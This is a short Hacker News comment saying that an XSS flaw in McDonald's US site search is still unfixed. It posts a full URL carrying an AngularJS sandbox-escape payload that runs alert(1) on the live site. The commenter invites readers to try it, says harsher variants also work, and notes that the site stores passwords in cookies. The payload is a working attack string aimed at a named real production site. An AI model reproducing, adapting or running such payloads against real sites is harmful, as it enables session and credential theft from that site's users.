Hacker News new | past | comments | ask | show | jobs | submit login

They still haven't fixed it. I'm only getting it to work in Chrome though, seems like the Angular sandbox escape doesn't work in Firefox. See for yourself (I'm only posting the more harmless alert demo, but the others work too):

  https://www.mcdonalds.com/us/en-us/search-results.html?q=%20{{x%20%3D%20{'y':''.constructor.prototype};%20x['y'].charAt%3D[].join;$eval('x%3Dalert(1)');}}
Then again, I wouldn't expect them to fix it very fast, considering how abysmal it is to basically store a user's password in a cookie in the first place.



Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: